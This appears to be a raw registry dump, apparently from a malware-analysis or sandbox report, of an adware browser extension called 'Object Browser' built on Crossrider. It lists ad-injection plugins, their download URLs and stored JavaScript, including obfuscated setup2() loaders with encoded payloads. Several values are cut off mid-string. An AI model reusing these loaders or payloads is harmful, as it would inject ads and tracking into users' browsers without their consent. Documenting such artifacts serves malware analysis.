    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE2ZjYwNGIwMjAzMTMxMzIyMTQxNjQ3NTM0OTQ4MWYxMzE3MDc1YzU1NGEwNzE5MTk1OTA5MGMwNzE0MTUwNzA1MGMwNzA3MTcwMDU5MDUxNTA4NDYwNzFhMDQwNTRjMWIwOTFkMGMwYTQ3MDAwNDU4MmMwNTBmMWQwYzA3MjAwZTRhMjI1YjM2NTIzYjU3NWEyODQ3MzU1NzUwNDM0YjNmNTc1ODU4NDczNjVlMjI0NzRiNGE1NTU4NWM1YjQwMjM1MjQ3MjA0YzIwNGYzYTAzMDMwMjJhMTM1YjI5MDQwNTBjMTk1MTM3MDIwNTEyMTQwMDFiMjAyZTRhNTU1MzQ3NTY0YTQzMzkxYjA1MTMxMjAwMDMyODFiMDgwYzU0MzUyODI0MzEzODM1MjkzNzIwMmQyZjI1MzgyMjI3MzYyNTJiMjgyNDJmMjgzODQ1MjMwOTE1MDkwYjA4MTgzZTAzNWUyODM5MzkzNzI2M2EzOTI1MmUyNzMyMzQyNTM2M2MyYjM1M2UyMzNjMjg0NDU2NmY2MDRiMDIwMzEzMTMwNDMzMDgwOTRiNTM0YTU1MGYxNzAzMTYwOTVmNDY0NjA0MDcxNDRkMTkwOTBhMTcwNjBiMDYxMjBhMTMwNzA1NTQwNjA2MDQ0NTE5MTcxMDE1NDkxNjBhMGUwMDA5NTkwZDEwNDgyOTA4MGMwZTAwMDQzZTAzNWUzMjVlM2I1MTI4NWI1OTM2NGEyMTQ3NTU0ZTQ4MmM1YjViNDY0YTIyNGUyNzRhNDg1OTU5NWI0MjU2NTQzMzU3NGEyMzVmMmM0YzI0MGUxNzEyMmYxZTU4M2EwODA2MTIxNDQ1MjcwNzA4MTEwNzBjMTgzZTIzNWU0NTU2NGE1NTU5NGYzYTA1MDgwNzAyMDUwZTJiMDgwNDBmNGEzODNjMzQzNDM1MzYzYTNiMjMzMzIyMzEyODI3MmEzNTM2MjcyYjNhMjIJ"

    [HKCU\Software\Object Browser\Plugins\246]
    "JavaScript" = "var _0x25da=[""\x73\x74\x72\x69\x6E\x67""

    [HKCU\Software\Object Browser\Plugins\269]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/stats/ie.js"

    [HKCU\Software\Object Browser\Plugins\4]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\Object Browser\Plugins\217]
    "Name" = "similar_products_m"

    [HKCU\Software\Object Browser\Plugins\244]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\207]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\22]
    "JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}elઘH"

    [HKCU\Software\Object Browser\Plugins\269]
    "Name" = "stats_ie"

    [HKCU\Software\Object Browser\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\Object Browser\Manifest]
    "Name" = "Object Browser"

    [HKCU\Software\Object Browser\Plugins\259]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/bpo_intext_m.js"

    [HKCU\Software\Object Browser\Plugins\183]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\45]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n;H"

    [HKCU\Software\Object Browser\Plugins\223]
    "Name" = "imonomy_m"

    [HKCU\Software\Object Browser\Plugins\259]
    "Name" = "bpo_intext_m"

    [HKCU\Software\Object Browser\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\Object Browser\Plugins\9]
    "Version" = "3"

    [HKCU\Software\Object Browser\Plugins\180]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/bpo_serp_m.js"

    [HKCU\Software\Object Browser\Manifest]
    "ModeType" = "production"

    [HKCU\Software\Object Browser\Plugins\13]
    "Version" = "7"

    [HKCU\Software\Object Browser\Plugins\42]
    "Version" = "9"

    [HKCU\Software\Object Browser\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){eH"

    [HKCU\Software\Object Browser\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\Object Browser\Plugins\44]
    "Name" = "IEMisc"

    [HKCU\Software\Object Browser\Plugins\223]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKCU\Software\Object Browser\Plugins\104]
    "Version" = "9"

    [HKCU\Software\Object Browser\Plugins\244]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2ZDZkNGIxYTFjMDUxYjIyMDAwOTQ1NWU0OTUwMDAwNTFmMDc0ODRhNDgwMTExMDY1OTVmMGUxOTE1MDQwMDAxMTAxMzQ2MTIwNDFhNWQxMjBlMDAwZTE3MWM1ZTAyMTkxODAwMDQxMDM2MDExODEwMTkxYzVkMGMwOTBlMzYwMTE4MDMwMDI4MDExMTA2MTYxZDE3MWE1ZjAxMDQ0ZDE1MGUwMDU0M2UzYzM0MTgzODM2MjQ1NjJiMmQyMzFiM2MwMTEwNDEyODBkMmQxYTNjMmMxMjVmMzgyNjI0NDI1NzJkNTQxYjA0MDkxZTE2NTgzODNiMmEyMDI3MjIzODI1M2IyMTIyMzYzNjIxM2QzMzM0M2UzNjNhMzg0NjQ1Nzg2MTUzMWIxYjA3MDIwZTBhMjAxNjRhNGI0YjQ1NDY1MTZkMTk=', 'egdirhqkwr'); }"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Object Browser\Plugins\13]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderAppUtils.js"

    [HKCU\Software\Object Browser\Plugins\35]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
    [HKCU\Software\Object Browser\Plugins\39]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\4]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\38]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IECallbacks.js"

    [HKCU\Software\Object Browser\Plugins\43]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\244]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/engageya_inner_m.js"

    [HKCU\Software\Object Browser\Plugins\72]
    "JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p16"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\Object Browser\Manifest]
    "homepageurl" = "NA"

    [HKCU\Software\Object Browser\Plugins\72]
    "Version" = "5"

    [HKCU\Software\Object Browser\Manifest]
    "SetNewTab" = "false"

    [HKCU\Software\Object Browser\Plugins\244]
    "Name" = "engageya_inner_m"

    [HKCU\Software\Object Browser\Plugins\21]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/debug.js"

    [HKCU\Software\Object Browser\Plugins\184]
    "Version" = "9"

    [HKCU\Software\Object Browser\Plugins\180]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk3YjY2NDUxMjExMTcwMzM5MDIwZTUzNTU0NzU4MGQxNzA3MWM0YTRkNWUwZTAzMDk0YjE3MTUxNDE5MTM1ZjBjMDgxNzRhMDI1ZDFjMTgxMjRlNTk1NTRjMTcwNjE1NWU0ZDNkMmUyYzM1MzUzNjMwMjEyNTM0MjcyMzMwMzQyZjI3M2MzYTI4MmYzZDU3NTk1NTRjMmIwMjFlMDk0ZDNkMmUyYzM1MzUzNjMwMjEyNTM0MjcyMzMwMjYyYTM1M2MzZDJkM2QyNzJlMzA0MTRjNTc1NTAxMDkxNjUxNGMzMDM4MzkzNzJjMjAzZjIyMmIzNTJhMzUyNTMwMzAzNjNlMmYyYjM1MzAzODVjNTM1MTQ1MWUxNTA0NDA1MjUxNDk1MjUxNDUwYTQ3NTE0NjVjNTA0ODUzNWE0NTU4NDY1NzQ2NWQ0MTBlMDAwYTE3NTEyZjNkMzIzZDI4MjkzNjMxM2EyODM1MzAyZTJlMzcyYTNhMmEzNzMzMmY0NDA1MWEwZTFlNTgzYzJjMmYyMjJkMjIzYzM1MzMyMTI2MjEzMzM5MmMyMjNiMjYzNjI5MjYyMTMzMjUzMTM0M2QzODMzMjEzYzJjNGU1YzY4Nzg0ZDBmMGUxMTEzMDAzOTAyMGU1MzU1NDc1ODBkMTcwNzFjMDM1ODVlNDAwNjFlMTY0ZDA3MGEwODBiMDA0MTA0MTUwODRjMTI0MjAwMGEwMTUwNTE0ODUzMTExNjBhNDI1ZjJlMzAyNDI4MmEzMDIwM2UzOTI2MzQzZDM4MjkzMDIxMmMyNTM0M2QyZTQ5NTE0ODUzMmQxMjAxMTU1ZjJlMzAyNDI4MmEzMDIwM2UzOTI2MzQzZDM4M2IzNTMzMmMyMjMxMmYzNDMwMzg1YzUzNTE0NTFlMTUwNDQyNTIzODI1MjYzMTNjM2YyMzMwMzgyYjIyMjgzYTM2MjAyOTIyM2QzODJiMzgyNTQzNTUH"

    [HKCU\Software\Object Browser\Manifest]
    "Description" = "Browser enhancer"

    [HKCU\Software\Object Browser\Plugins\93]
    "Version" = "12"

    [HKCU\Software\Object Browser\Plugins\36]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBackground.js"

    [HKCU\Software\Object Browser\Plugins\46]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IETimers.js"

    [HKCU\Software\Object Browser\Plugins\64]
    "Version" = "3"

    [HKCU\Software\Object Browser\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\Object Browser\Plugins\41]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInfo.js"

    [HKCU\Software\Object Browser\Plugins\1]
    "JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});O"

    [HKCU\Software\Object Browser\Plugins\72]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/appApiValidation.js"

    [HKCU\Software\Object Browser\Plugins\94]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

    [HKCU\Software\Object Browser\Plugins\91]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/monetizationLoader.js"

    [HKCU\Software\Object Browser\Plugins\102]
    "Version" = "8"

    [HKCU\Software\Object Browser\Plugins\93]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"

    [HKCU\Software\Object Browser\Manifest]
    "Version" = "200"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKCU\Software\Object Browser\Manifest]
    "UninstallerOfferUrl" = "NA"

    [HKCU\Software\Object Browser\Plugins\182]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/openUrl.js"

    [HKCU\Software\Object Browser\Plugins\177]
    "Name" = "crossriderDashboard"

    [HKCU\Software\Object Browser\Installer]
    "osName" = "XP32"

    [HKCU\Software\Object Browser\Plugins\28]
    "JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

    [HKCU\Software\Object Browser\Plugins\7]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/hooks.js"

    [HKCU\Software\Object Browser\Manifest]
    "UpdateInterval" = "360"

    [HKCU\Software\Object Browser\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHttH"

    [HKCU\Software\Object Browser\Plugins\180]
    "Version" = "10"

    [HKCU\Software\Object Browser\Plugins\217]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/similar_products_m.js"

    [HKCU\Software\Object Browser\Plugins\28]
    "Name" = "initializer"

    [HKCU\Software\Object Browser\Plugins\64]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/appApiMessage.js"

    [HKCU\Software\Object Browser\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\Object Browser\Plugins\36]
    "Version" = "8"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\Object Browser\Plugins\183]
    "Name" = "tabsWrapper"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\Object Browser\Plugins\64]
    "Name" = "appApiMessage"

    [HKCU\Software\Object Browser\Plugins\44]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMisc.js"

    [HKCU\Software\Object Browser\Plugins\40]
    "Name" = "IEExtension"

    [HKCU\Software\Object Browser\Plugins\259]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA2NDc5NTIxODEwMDIxYTI3MWQwNzRjNGE1MDUyMGMwMjFlMDI1NTQ0NDExMTE0MDM0YTAyMGMwYTA2MWE0MDEzMWYxZDRiMTc0NDAyMDcxYjUxNDY0MjQ2MTYxMzBjNDM1MjVkNWQ0NzQyNDYwMjQxNTk0NTVjNWM1YzQ2NDk0NjUwNDA1ZjQ1NWQ1ZDU3NDYxNTQ3NTA1MDVjNDA1OTE5MGIxNjQyNGQzYjI5MjkyMDIwMzgzZDIyMzkzNDIxMjQzNTIxM2EyOTMxMzkzNDJmM2I1MDVjNDA1OTE5MGIxNjQzNGQzYjI5MjkyMDIwMzgzZDIyMzkzNDIxMjQzNTI3M2MyZTNjMmYzOTM0M2IyOTRjNDQ1ZDVkMjAxMTFkMTU1OTI5MzUzMTNkMjQzZDIzMjIzOTIwMzMzODJkMmUzYjNlMmYzZTMxMjkzMzM1MmQ0OTFmMGIxOTE0NGQzYjI5MjkyMDIwMzgzZDIyMzkzNDIxMjQzNTMzM2YzYjMxMzkzNDJmM2I1MDFlMDcwNjBmNTMyZjJmMzMzNjM5MzkyMTNkMjIyYTM1MjIyZjJkMzgzOTI2MmUyNzIyMzUyMjJmMzEyNTJmMjAzMDIyMmEyZjJmNTI0ODdjNjM1MDA3MWYxYTAwMDMyNTE2MWE0ODQ4NGY0OTA2MDQwNDAwMTc0YzQ1NWQwZTBmMWQ1ZTA0MTYxYzFmMWI1YzBjMDQwMzVmMTE1ZTE0MWUxYTRkNTk1OTU4MDIxNTE2NTU0YjVjNDE1ODU5NTgxNjQ3NDM1MzQ1NWQ0MDU5NTI1ODQ0NDY0NTUzNDQ1YzRiNTkwZTU5NDQ1NjQ2NTY0MDE4MTcwOTU5NTMyZjJmMzMzNjM5MzkyMTNkMjIyYTM1MjIyZjM3MjMyODJkMjYyZjMxMmY1NjQ2NTY0MDE4MTcwOTU4NTMyZjJmMzMzNjM5MzkyMTNkMjIyYTM1MjIyZjMxMjUyH"

    [HKCU\Software\Object Browser\Plugins\44]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)36"

    [HKCU\Software\Object Browser\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\Object Browser\Plugins\38]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO"

    [HKCU\Software\Object Browser\Plugins\217]
    "Version" = "20"

    [HKCU\Software\Object Browser\Plugins\1]
    "Version" = "10"

    [HKCU\Software\Object Browser\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Object Browser\Plugins\93]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM2OTY3NTAxZDAzMGUwYTNkMTYxNDQxNTQ1MjU3MWYwZTBlMTg1ZTU3NGMxOTA1MDI1OTA5MGYxODAxMGEwNTA3MDExZDU5MTkxNTA1NGIwZjEwNDEwMTEzMjgxNzFiMDEwYTU2MDkxZDAyNGExMzE2MDkwNzExMGEwMDBiNGYxZDFmMGMwMDA1MGQxMzE0NDgwNzA2MTIwODMzMGM1OTE5MDEwZDU0MzYyMzMzM2U1NTNiMjcyMDNjM2QyNjI0MjgzMzJjMjEyYTNjMmIyYTIxMzIzNDNlMmQyMDI3MzAzYjMwMmEzZTNlMjUzNzQ2NTQ2OTY3NTAxZDAzMGUwYTFiMzEwYTBmNGM0ODU1NTUxMjBlMWMxNDBiNTk0MTVkMDIwMDBkNTQxYjExMDgwNjFjMTQxYzA0MTI1NDBiMGIxNTRjMTkwMTVhMDQxYzI1MDUwNTExMGQ0MDE4MDYwNzQ1MWUwNDE3MTcxNjFjMTExMDRhMTIxMjFlMWUxNTBhMDUwNTUzMDIwOTFmMWEyZDFjNWUwZjEwMTY1MTM5MmUyMTIwNDUzYzMxMzEyNzM4MjkyOTNhMmQzYzI2M2MyZDMwMmYyZTNmMjYyMDNkMjczMTIxMjAzNTI1MzMyYzNiMjc0MTQyNzg3YzU1MGExNjFkMDMxMTBkMjcxNjU3NGQ1YTQzNWI2ZTA1', 'xcnruwzzhd'); }"

    [HKCU\Software\Object Browser\Plugins\191]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTQ3ZDc5NTMxZjFkMTExYzI2MDcwMzU1NGE1MTU1MDExMTE4MDM0ZjQwNTgwMzA1MTYxZDBjMGY1ZDE2MDYwMjA2MWU1OTBhMGEwMTVjMTgwYTEzMTkxMDU4MWEwMTA3NWMwNTFkMWUxMzE0MDQxOTA0MWUwMTFhMTg1YTQxNWY0MzQ3MDgwNTFkNWIwNTA0NTI1ZDdkNjA0NzA0MDcwMTFmMDQyNTAzMWI0YjVmNGM1MTFkMWIwMzAwMDI0ZDQ2NGExZjE2MTYxYTA1MTU1ZjE0MDAxMDFhMWM1YjBjMTgxZDVlMWEwYzAxMDUxMjVhMWMxMzFiNWUwNzFiMGMwZjE2MDYxZjE2MDIwMzE4MWU0ODVkNWQ0MTQxMWExOTFmNTkwMzE2NGU1ZjdmNjY1NTAwMWQwMjBlMGMwMjNhMTE0ZDRkNTA0MDRlNTg0OTY2NTM1NTRmNTc1MjA3MTIxYjExMDUxMDE0MDM1NTRhNTEyYzRiMTYwNDFjMDUxZjFlMWUxNjU1MzQ0OTY2NTM1NTRmNTc1MjE4MTkwNTBjMDIxNjNmM2M1NTRhNTE1NTAwMDM0YzViMDExNjA3MTUxZTExNDkxMjA1MWQxMTAwMDA1ZTJlMTQwMDEwMWExYzA1MWQxMjE2MDI1NzU0NTg1MTUzNTIxYTE5MTQxNDExMDAwYjA5MTc1MjQ2NTcwNzE4MTkwZDBhMWI1ZDJhMGMxZTA1MDcxODE5MTcwOTE1MDY0ZjRhNTAwYTBhNTI0NTRjMDQxYzAxMTMxZjA2NTkzNjA2MDUwNjAzMDAwNzAyMTQxMTFhNGIxYzAxMWMwYzEyMDMwMTE2MWIxNzAzMDQ1NTUyNTcwYjU2MTQwODA4MWMxMjFjMDgxOTU3NGI1NzRlMDYxZTFjMDYxYzA1MTkxNTEyMWIzYTMzMzAyNzIwMjQyMzIzM2UyZDIwM2UyYzI2M2EzNTJmMzgzMzM2M2EL"

    [HKCU\Software\Object Browser\Manifest]
    "RunInFrame" = "false"

    [HKCU\Software\Object Browser\Plugins\35]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEAjax.js"

    [HKCU\Software\Object Browser\Plugins\211]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2MTc5NDEwYTA2MGMxYjM4MDAxYTQ5NGE0MzQwMWEwYzFmMWQ0ODU5NDQxMTEwMTAwNDU1MGE0MzEzMWQwYTFkMDIwYjFhMWM0NTAzMTcwMjQ0MDMwNzRkNDM0ZjViNWQ1ZDQ3NWI0NDU2NGMxODBiNDk0MTc4N2Y0OTE4MTcxNjAyMGIzZTFmMWU1NDUxNTA0MTBhMDYwYzFiMWU0ODU5NDQxMTEwMTAwNDU1MGE0MzEzMWQwYTFkMDIwYjFhMWM0NTAzMTcwMjQ0MDMwNzRkNDM0ZjViNWQ1ZDQ3NWI0NDU2NGMxODBiNDk0MTc4N2Y0OTAwMGYxNzE1MTEwNTI0MTY1NDUxNTA1MTUzNDM1NDYxNGQ1MjU2NGI1MjE1MDcwMDBjMDIwZTEzMWE0OTRhNDMzOTUwMTkwZjFlNTAyYjQ3N2E0MzQyNTI1ODQ5MDQxYzFhMDIxZTA2MjgyMTVhNTE0ZDUwMDEwMjFlMDcwZDA1NTYzNDFmMDQwYzVhNDc1MzUyMGE0OTViNTk0NzU2NTY1MDE4NDI1NTA4MWUwZjFlMWYxODE4MDYxMDJkMGIxZTBmMWIxMjRjNGE0MzQ1MmQyNzI4M2YzZDI1MzgyMjJhMjYzNzJhMzQyMTNiMzEyMzI0M2MzMTI3M2EzNDI0MzYyOTM0NTc0MzQ5NTI1ZjViNWQ0MjQ2NWI0MDUzNTI0MjQ4NWI0YTBmNGQ0OTdhMWU=', 'vkpcbrxkmr'); }"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Object Browser\Plugins\3]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\37]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBrowserEvents.js"

    [HKCU\Software\Object Browser\Plugins\257]
    "Name" = "adextent_m"

    [HKCU\Software\Object Browser\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

